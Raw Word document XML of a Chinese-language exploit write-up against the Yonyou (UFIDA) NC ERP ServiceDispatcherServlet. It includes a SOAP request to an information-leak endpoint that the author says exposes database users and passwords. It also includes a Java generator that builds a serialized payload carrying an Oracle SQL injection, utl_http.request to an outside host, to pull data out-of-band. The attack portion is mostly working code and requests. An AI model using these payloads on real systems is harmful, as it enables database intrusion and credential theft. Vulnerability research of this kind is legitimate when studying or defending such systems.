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1F" w:rsidRPr="005A051F" w:rsidRDefault="005A051F" w:rsidP="005A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5A051F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>web.xml:</w:t>
      </w:r>
      <w:r w:rsidRPr="005A051F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/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&lt;servlet-mapping&gt;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&lt;servlet-name&gt;CommonServletDispatcher&lt;/servlet-name&gt;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&lt;url-pattern&gt;/ServiceDispatcherServlet/*&lt;/url-pattern&gt;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&lt;/servlet-mapping&gt;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&lt;servlet&gt;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&lt;servlet-name&gt;CommonServletDispatcher&lt;/servlet-name&gt;      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&lt;servlet-class&gt;nc.bs.framework.comn.serv.CommonServletDispatcher&lt;/servlet-class&gt;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&lt;init-param&gt;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   &lt;param-name&gt;service&lt;/param-name&gt;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   &lt;param-value&gt;nc.bs.framework.comn.serv.ServiceDispatcher&lt;/param-value&gt;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&lt;/init-param&gt;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   &lt;load-on-startup&gt;10&lt;/load-on-startup&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A051F" w:rsidRPr="005A051F" w:rsidRDefault="005A051F" w:rsidP="00F3435D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5A051F">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>&lt;/servlet&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000068B2" w:rsidRDefault="000068B2"/>
    <w:p w:rsidR="005A051F" w:rsidRDefault="005A051F"/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这里我们只说变化的部分：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直接看</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A051F" w:rsidRDefault="005A051F" w:rsidP="005A05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InvocationInfo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这个类：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A051F" w:rsidRPr="00F3435D" w:rsidRDefault="005A051F" w:rsidP="005A051F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F3435D">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>public InvocationInfo(String module, String serviceName, String methodName, Class&lt;?&gt;[] parameterTypes, object[] parameters, String clientHost) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A051F" w:rsidRPr="00F3435D" w:rsidRDefault="005A051F" w:rsidP="005A051F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F3435D">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>    this(serviceName, methodName, parameterTypes, parameters, clientHost);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A051F" w:rsidRPr="00F3435D" w:rsidRDefault="005A051F" w:rsidP="005A051F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F3435D">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>    this.module = module;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A051F" w:rsidRPr="00F3435D" w:rsidRDefault="005A051F" w:rsidP="005A051F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F3435D">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>}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相比以前多了一个最后的参数，请求的来源ip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现在的63相对于53是数据传输加密的：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流程是这样的，客户端和服务端共同约定一个算法，然后客户端传递的数据是加密的，到服务端再进行解密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这么一来，貌似很合理的请求流程就有些脱裤子放屁</w:t>
      </w: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5A051F" w:rsidRDefault="005A051F" w:rsidP="005A051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因为客户端的代码我们可以通过cache同步，那么构造后的payload自然就能被服务端解析，我们不需要知道算法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lastRenderedPageBreak/>
        <w:t>开始构造payload：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&lt;component priority="0" remote="true" singleton="true" supportAlias="false" tx="CMT" accessProtected="false"&gt;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&lt;interface&gt;nc.bs.dbcache.intf.IOutDateVersion&lt;/interface&gt;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&lt;implementation&gt;nc.bs.dbcache.impl.OutdateVersionImpl&lt;/implementation&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D4DBA" w:rsidRDefault="00E36BB9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 </w:t>
      </w:r>
      <w:r w:rsidR="001D4DBA" w:rsidRPr="001D4DBA">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>&lt;/component&gt;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public SyncPointVersions getOutDateVersions(String afterTs) {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SyncPointVersions spv = null;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try {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long e = TimeService.getInstance().getTime();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String machineTime = StringUtil.getTimeStampString(e);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if(afterTs == null || machineTime.compareTo(afterTs) &lt; 0) {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  afterTs = "-1";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}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String querySql = "select CacheTabName,CacheTabVersion  from (Select CacheTabName, CacheTabVersion,row_number() over (partition by cachetabname order by cachetabversion desc) rn  from BD_cachetabversion  where CacheTabVersion &gt;=\'" + afterTs + "\' ) ctv where ctv.rn=1";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Logger.debug("execute query cache version SQL:" + querySql);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List list = (List)(new ServerDBFacade()).runQuery(querySql, new ArrayListProcessor());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if(list.size() &gt; 0) {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  spv = new SyncPointVersions();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  HashSet versionSet = new HashSet();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  spv.setTs(afterTs);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D4DBA" w:rsidRPr="001D4DBA" w:rsidRDefault="001D4DBA" w:rsidP="001D4DBA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1D4DBA">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>            Iterator i$ = list.iterator();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这里进行了数据拼接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在开始构造payload之前我们必须知道几个变量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obj.setUserId();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obj.setLangCode();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obj.setUserDataSource();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obj.setModule();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这里我们可以通过一处信息泄露，查到所有的值：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POST /uapws/service/nc.itf.ses.inittool.PortalSESInitToolService HTTP/1.1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User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0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Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8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Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3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Accept-Encoding: gzip, deflate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Referer: http://myerp.ufida.com/uapws/service/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Cookie: JSESSIONID=9DC24FF814401CED1B23B3074D99D6D7.ncServer; JSESSIONID=F525E5941181E4D85D8D3CEA214984D0.ncServer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X-Forwarded-For: 8.8.8.8'"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Connection: keep-alive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Upgrade-Insecure-Requests: 1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Cache-Control: max-age=0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SOAPAction: urn:getDataSourceConfig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Content-Type: text/xml;charset=UTF-8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Host: myerp.ufida.com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Content-Length: 256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&lt;soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:por="http://inittool.ses.itf.nc/PortalSESInitToolService"&gt;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&lt;soapenv:Header/&gt;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&lt;soapenv:Body&gt;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   &lt;por:getDataSourceConfig/&gt;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&lt;/soapenv:Body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D4DBA" w:rsidRDefault="001D4DBA" w:rsidP="001D4DB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&lt;/soapenv:Envelope&gt;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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56C991F1" wp14:editId="109D5DB9">
            <wp:extent cx="5274310" cy="77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还泄露了数据的密码和用户</w:t>
      </w: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</w:p>
    <w:p w:rsidR="001D4DBA" w:rsidRDefault="001D4DBA" w:rsidP="001D4DB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当然这个不是重点，我们要的就是这几个值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E41B85" w:rsidRDefault="00E41B85" w:rsidP="00E41B8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构造payload：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package nctest;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import nc.bs.framework.common.InvocationInfo;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import nc.bs.framework.comn.NetobjectOutputStream;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import nc.login.vo.LoginRequest;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import java.io.FileOutputStream;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lastRenderedPageBreak/>
        <w:t>public class fenxi {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public static String filename = "E:/IdeaProjects/ncclientjiami/payloads/1.fenxi.bin";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public static void Gen_payload(InvocationInfo obj) throws Exception{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obj.setUserId("#UAP#");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obj.setLangCode("simpchn");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obj.setUserDataSource("nc");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obj.setModule("uap");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obj.setUserCode("test");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FileOutputStream output = new FileOutputStream(filename);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NetobjectOutputStream.writeobject(output, obj);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}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//nc.bs.dbcache.intf.IOutDateVersion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public static void Sqlinjection_01() throws Exception {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Class[] parametertypes = new Class[]{String.class};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object[] parametervalues = new object[]{"1' and utl_http.request('http://yongyou.ksorvd.ijiandao.win')='1"};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InvocationInfo obj = new InvocationInfo("nc.bs.dbcache.intf.IOutDateVersion","getOutDateVersions",parametertypes,parametervalues,"169.254.80.196");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Gen_payload(obj);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}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public static void main(String[] args) throws Exception {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    Sqlinjection_01();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    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E41B85" w:rsidRPr="00E41B85" w:rsidRDefault="00E41B8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 w:rsidRPr="00E41B85">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A051F" w:rsidRDefault="00405745" w:rsidP="00E41B85">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D51672C" wp14:editId="53A966D1">
            <wp:extent cx="5274310" cy="1536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0A" w:rsidRDefault="00631F0A" w:rsidP="00631F0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然后发包测试，这里我们通过cloueye抓取</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00631F0A" w:rsidRDefault="005A078A" w:rsidP="00631F0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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="774C8B68" wp14:editId="420BAE4D">
            <wp:extent cx="5274310" cy="978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0A" w:rsidRDefault="00631F0A" w:rsidP="00631F0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构造一个能出数据的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00631F0A" w:rsidRDefault="00BF4F3C" w:rsidP="00631F0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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="234C3358" wp14:editId="4DA8E120">
            <wp:extent cx="5272525" cy="953114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431" cy="9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0A" w:rsidRDefault="00D91368" w:rsidP="00631F0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color w:val="99999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2EC409" wp14:editId="5FE0E194">
            <wp:extent cx="5274310" cy="1127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F0A" w:rsidRPr="00E41B85" w:rsidRDefault="00631F0A" w:rsidP="00E41B85">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00631F0A" w:rsidRPr="00E4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B9" w:rsidRDefault="003A5AB9" w:rsidP="005A051F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="003A5AB9" w:rsidRDefault="003A5AB9" w:rsidP="005A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B9" w:rsidRDefault="003A5AB9" w:rsidP="005A051F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="003A5AB9" w:rsidRDefault="003A5AB9" w:rsidP="005A0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E0"/>
    <w:rsid w:val="000068B2"/>
    <w:rsid w:val="001D4DBA"/>
    <w:rsid w:val="003A5AB9"/>
    <w:rsid w:val="00405745"/>
    <w:rsid w:val="005A051F"/>
    <w:rsid w:val="005A078A"/>
    <w:rsid w:val="00631F0A"/>
    <w:rsid w:val="00833AF0"/>
    <w:rsid w:val="00BF4F3C"/>
    <w:rsid w:val="00CB33E0"/>
    <w:rsid w:val="00D91368"/>
    <w:rsid w:val="00E36BB9"/>
    <w:rsid w:val="00E41B85"/>
    <w:rsid w:val="00F2678D"/>
    <w:rsid w:val="00F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8E601"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{33136F21-CB61-4D8D-B30C-25EDF30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51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A0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051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0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2017-07-21T15:44:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-07-21T15:51:00Z</dcterms:modified>
</cp:coreProperties>
</file>